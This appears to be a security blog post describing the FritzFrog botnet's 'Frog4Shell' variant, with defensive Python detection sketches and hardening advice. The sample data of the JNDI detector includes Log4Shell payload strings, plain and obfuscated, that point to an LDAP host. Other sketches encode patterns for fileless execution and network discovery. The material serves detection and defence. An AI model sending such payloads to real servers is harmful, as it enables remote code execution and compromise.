FritzFrog: An Overview of the New Botnet Variant Exploit Called ‘Frog4Shell’
February 26, 2024
Posted By: Research Team

FritzFrog: An Overview of the New Botnet Variant Exploit Called ‘Frog4Shell’ that Infects using Log4Shell

The Akamai Security Intelligence Group uncovered a new variant of the FritzFrog botnet that leverages the Log4Shell vulnerability, dubbed Frog4Shell. This evolution marks a significant shift in tactics: FritzFrog now combines brute-force SSH attacks with Log4Shell exploitation to compromise both internet-facing servers and internal hosts. The malware also incorporates a privilege escalation module targeting CVE-2021-4034 in polkit, which gives it root access on vulnerable servers.

Existing Version

  • Initial Compromise

FritzFrog infects internet-facing servers via SSH brute force attacks.

FritzFrog initiates its attack by exploiting weak SSH credentials on internet-facing servers. This method gives the attacker initial access to a wide range of targets; over time, the brute force technique has allowed FritzFrog to compromise thousands of servers and establish footholds within many networks.

New Version

  • Log4Shell Exploitation

FritzFrog targets the Log4Shell vulnerability, injecting payloads through HTTP headers.

FritzFrog evolves its tactics by exploiting the Log4Shell vulnerability; this variant is known as Frog4Shell. The malware injects its payload through HTTP request headers that vulnerable Java applications log, which triggers the flaw. By targeting ports commonly used by HTTP servers (8080, 8090, 8888, and 9000), FritzFrog triggers Log4Shell indiscriminately across a broad range of potential targets.
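
A detection sketch for the behaviour described above, added here as an example and not code from the original post or from Akamai: it scans HTTP request headers (assumed to be available from a reverse-proxy or WAF log) for the Log4j JNDI lookup string that Log4Shell exploitation relies on, collapses the common single-character lookup obfuscations first, and marks hits on the ports listed above. The request records and addresses are constructed.

```python
import re

# Ports the page says FritzFrog probes for Log4Shell-vulnerable HTTP services.
FROG4SHELL_PORTS = {8080, 8090, 8888, 9000}

# Log4j lookups that resolve to a single character and are used to hide the "jndi" keyword:
# ${lower:j}, ${upper:N}, ${::-d}, ${env:UNSET:-i}
_CHAR_LOOKUP = re.compile(r"\$\{(?:lower|upper):([a-z])\}|\$\{[^{}]*:-([a-z])\}", re.IGNORECASE)
# The JNDI lookup that Log4Shell hinges on, once obfuscation is removed.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def normalize(value: str) -> str:
    """Repeatedly collapse single-character lookups until the string stops changing."""
    prev = None
    while prev != value:
        prev = value
        value = _CHAR_LOOKUP.sub(lambda m: (m.group(1) or m.group(2)).lower(), value)
    return value

def has_jndi_lookup(value: str) -> bool:
    """Match on the raw header value and on its de-obfuscated form."""
    return bool(_JNDI_LOOKUP.search(value) or _JNDI_LOOKUP.search(normalize(value)))

def scan_requests(requests):
    """Return one finding per header carrying a JNDI lookup; note page-listed ports."""
    findings = []
    for req in requests:
        for name, value in req["headers"].items():
            if has_jndi_lookup(value):
                findings.append({
                    "src": req["src"],
                    "dst_port": req["dst_port"],
                    "header": name,
                    "frog4shell_port": req["dst_port"] in FROG4SHELL_PORTS,
                })
    return findings

# Constructed sample requests (RFC 5737 documentation addresses), not captured traffic.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "dst_port": 8080,
     "headers": {"User-Agent": "${jndi:ldap://203.0.113.7:1389/a}"}},
    {"src": "203.0.113.7", "dst_port": 9000,
     "headers": {"X-Api-Version": "${${lower:j}${upper:n}${::-d}${env:UNSET:-i}:ldap://203.0.113.7:1389/a}"}},
    {"src": "198.51.100.4", "dst_port": 443,
     "headers": {"User-Agent": "Mozilla/5.0", "Accept": "*/*"}},
]
```

Feed `scan_requests` with records built from your proxy or WAF log; a hit on one of the four ports from an unknown source is the pattern the page describes.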

 

  • Internal Network Scanning

FritzFrog scans the internal network for Log4Shell-vulnerable hosts.

After compromising an internet-facing server, FritzFrog extends its reach into the internal network behind it. The malware scans that network for additional hosts vulnerable to Log4Shell, including hosts that are not directly exposed to the internet, and propagates the infection to them.

  • Privilege Escalation

FritzFrog gains root access on vulnerable servers by exploiting CVE-2021-4034.

FritzFrog integrates a privilege escalation module that exploits CVE-2021-4034 in polkit. On a server that has not been patched against this flaw, the module elevates the malware from the compromised user to root. With root privileges, FritzFrog can execute commands and actions with full permissions, which strengthens its persistence and lateral movement within the compromised environment.

  • Evasion Techniques

The malware employs fileless execution using /dev/shm and memfd_create.

FritzFrog employs evasion techniques built on Linux features that allow fileless execution: the shared-memory filesystem /dev/shm and the memfd_create system call, which creates an anonymous in-memory file that can be executed. With these, the malware runs its payloads without leaving an executable on disk, minimizing the likelihood of detection by file-based security controls. This stealthy approach lets FritzFrog operate covertly within compromised environments and prolong its presence.
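
One way to hunt for the fileless technique above, added here as an example rather than code from the original post: it reads the /proc/<pid>/exe link of each process and flags images backed by memfd_create or by /dev/shm. The sample process table is constructed; `snapshot_proc` is the only part that touches a live host.

```python
import os
import re
from typing import Dict, List, Optional, Tuple

# What /proc/<pid>/exe resolves to when the running image never existed as a regular file:
# memfd_create() images show up as "/memfd:<name> (deleted)", and binaries dropped in the
# tmpfs-backed /dev/shm are typically unlinked right after exec, leaving "... (deleted)".
_MEMFD = re.compile(r"^/memfd:")
_SHM = re.compile(r"^/dev/shm/")

def classify_exe(exe_link: str) -> Optional[str]:
    """Label a suspicious /proc/<pid>/exe target, or return None when it looks ordinary."""
    if _MEMFD.match(exe_link):
        return "memfd_create image"
    if _SHM.match(exe_link):
        unlinked = " (unlinked)" if exe_link.endswith(" (deleted)") else ""
        return "executable in /dev/shm" + unlinked
    return None

def find_fileless(procs: Dict[int, str]) -> List[Tuple[int, str, str]]:
    """procs maps pid -> readlink target of /proc/<pid>/exe; returns (pid, exe, reason) hits."""
    hits = []
    for pid, exe in sorted(procs.items()):
        reason = classify_exe(exe)
        if reason:
            hits.append((pid, exe, reason))
    return hits

def snapshot_proc() -> Dict[int, str]:
    """Collect exe links on a live Linux host; reading other users' processes needs root."""
    procs = {}
    for entry in os.listdir("/proc"):
        if entry.isdigit():
            try:
                procs[int(entry)] = os.readlink(f"/proc/{entry}/exe")
            except OSError:  # kernel threads, zombies, or permission denied
                continue
    return procs

# Constructed snapshot for demonstration, not taken from an infected host.
SAMPLE_PROCS = {
    1: "/usr/lib/systemd/systemd",
    842: "/usr/sbin/sshd",
    1337: "/memfd:kube (deleted)",
    1402: "/dev/shm/.x/nginx (deleted)",
    1450: "/usr/bin/java",
}
```

On a live host, run `find_fileless(snapshot_proc())` as root; before responding to a hit, compare the process's cmdline and memory maps against what the service is expected to run, since some legitimate runtimes also use memfd.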

 

Recommendations

The recent resurgence of the FritzFrog botnet, now leveraging the infamous Log4Shell vulnerability, puts networks at risk. The researchers provided a detection script that looks for signs of a FritzFrog infection on SSH servers. In addition, the following recommendations can help bolster defenses against FritzFrog:

Monitor suspicious commands, track file access, scrutinize network traffic, and check for new processes.

  • Regularly monitor executed commands and their arguments, particularly those attempting to gather information about other systems on the network using IP addresses or hostnames. Closely track executed commands and arguments from tools like “ping,” “netstat,” and “nmap,” and from scripts that search for hostnames or IP addresses. Pay attention to commands executed in quick succession, which suggests automated scanning, and to commands executed by unexpected or unauthorized users, especially in AAA logs for network devices.

  • Use Windows PowerShell logging (Event ID 4104) to capture PowerShell script block contents, focusing on commands indicative of RDP hijacking precursors, such as enumerating systems with RDP access.

  • Monitor attempts to access local files holding host information, such as “/etc/hosts” on Linux or “C:\Windows\System32\Drivers\etc\hosts” on Windows. Use event logs (such as Windows Event ID 4663 or Linux auditd logs) to alert on this access.

  • Monitor network connections for suspicious patterns, especially new connections associated with pings or scans, which could indicate an attempt to enumerate other systems on the network through ping sweeps, port scans, or other discovery protocols.

  • Monitor for the creation of new processes that may be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in rapid succession. Flag instances where these processes are used in ways inconsistent with typical system operation.
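
A small detector for the first and last points in this list (discovery commands aimed at other hosts, executed in quick succession by one user), added here as an example and not from the original post. The log format and the sample lines are constructed; a real deployment would feed it auditd execve records or a similar process-execution source.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Discovery tools named on the page; a run counts only when an argument is an IPv4 address
# or a dotted hostname, i.e. the command is aimed at another system.
DISCOVERY_CMDS = {"ping", "netstat", "nmap", "tracert", "traceroute"}
TARGET_ARG = re.compile(r"\b(?:\d{1,3}(?:\.\d{1,3}){3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)\b", re.I)
# Constructed record format, one exec per line: "<ISO time> user=<name> cmd=<argv>".
LOG_LINE = re.compile(r"^(\S+) user=(\S+) cmd=(.+)$")

def parse(lines):
    """Turn log lines into (timestamp, user, argv) tuples, skipping malformed ones."""
    events = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            events.append((datetime.fromisoformat(m.group(1)), m.group(2), m.group(3).split()))
    return events

def is_discovery(argv):
    """True for a discovery tool (matched by basename) invoked against a host."""
    if not argv or argv[0].rsplit("/", 1)[-1] not in DISCOVERY_CMDS:
        return False
    return any(TARGET_ARG.search(arg) for arg in argv[1:])

def find_bursts(events, window_s=10, threshold=5):
    """Alert once per burst when one user runs >= threshold discovery commands in window_s."""
    recent = defaultdict(deque)  # user -> timestamps of that user's recent discovery commands
    alerts = []
    for ts, user, argv in sorted(events, key=lambda e: e[0]):
        if not is_discovery(argv):
            continue
        q = recent[user]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) == threshold:
            alerts.append({"user": user, "start": q[0], "end": ts, "count": len(q)})
    return alerts

# Constructed sample log, not from a real host: one account sweeps 10.0.0.0/24 within seconds.
SAMPLE_LOG = """\
2024-02-26T10:00:01 user=svc-web cmd=ping -c 1 10.0.0.1
2024-02-26T10:00:02 user=svc-web cmd=ping -c 1 10.0.0.2
2024-02-26T10:00:02 user=svc-web cmd=ping -c 1 10.0.0.3
2024-02-26T10:00:03 user=svc-web cmd=/usr/bin/nmap -p 8080,8090,8888,9000 10.0.0.4
2024-02-26T10:00:04 user=svc-web cmd=ping -c 1 10.0.0.5
2024-02-26T10:05:00 user=admin cmd=ping -c 1 db01.corp.example
""".splitlines()
```

Tune `window_s` and `threshold` to the host's normal monitoring traffic so that a single administrator ping does not fire, while a sweep by a web service account does.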

 

Configure endpoint security solutions and employ Yama and security kernel modules. Focus on closely monitoring file metadata, modifications, access attempts, module loads, and OS API execution.

  • Make use of endpoint security programs that provide behavior-based preventive features. These can block popular process injection methods based on particular activity sequences. For example, Windows 10’s Attack Surface Reduction (ASR) rules can prevent code injection into Office apps.

  • Implement stricter controls on privileged accounts, limiting their ability to inject code into processes. On Linux, use Yama (via /proc/sys/kernel/yama/ptrace_scope) to restrict “ptrace,” the debugging interface used for injection, to privileged or otherwise authorized users only.

  • Consider deploying advanced security modules such as SELinux, grsecurity, or AppArmor. These provide granular access control and process restrictions, further hindering injection attempts.

  • Monitor contextual data about files for changes indicating code injection attempts, such as modifications made to inject code into processes in order to evade defenses or elevate privileges.

  • Track DLL/PE file events, specifically the creation and loading of DLLs into processes. Identify unfamiliar or unexpected DLLs that would not normally be loaded.

  • Keep an eye on Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, VirtualAllocEx, and WriteProcessMemory, which can be indicators of code injection. For Linux systems, monitor specific system calls such as ptrace, which are effective in detecting common process injection methods without generating excessive data.

  • Monitor processes for unauthorized viewing and modification, particularly attempts to inject code to evade defenses or escalate privileges. Check for process memory inconsistencies by comparing memory ranges against known legitimate modules to detect unauthorized modifications.

Enforce strong password policies, account lockout policies, and multi-factor authentication (MFA).

  • Implement minimum password length requirements (e.g., 12 characters) and complexity requirements (upper- and lowercase letters, numbers, and symbols). Consider password managers to reduce password reuse and insecure passwords.

  • Set account lockout policies that trigger after a specific number of failed logins (e.g., 5 attempts). This prevents attackers from guessing passwords through trial and error. However, avoid overly strict policies that might lock out legitimate users and create denial-of-service situations. Follow NIST recommendations when creating password policies.

  • Use conditional access restrictions to prevent logins from non-compliant devices or from IP addresses outside of specified organization ranges. Restricting the number of attempts an attacker can make helps repel brute force attacks.

  • Enforce multi-factor authentication (MFA) wherever possible, especially on externally facing services. This considerably lowers the chance that a brute force attack succeeds, even when credentials have been stolen.

Implement controls to block the download, transfer, and execution of potentially uncommon file types.

  • Put in place controls to prevent the downloading, transferring, and running of unusual file formats known to be used in hostile campaigns. This covers file formats frequently linked to malware, including executables, scripts, and compressed archives. Using web content filtering solutions, apply rules that limit access to questionable or unreliable websites known to disseminate harmful content.

  • To stay ahead of emerging threats and adversarial strategies, regularly update web filtering rules based on threat intelligence feeds. Inform users of the risks of downloading and running files from unreliable sources, and stress the need to always confirm the legitimacy of content before engaging with it.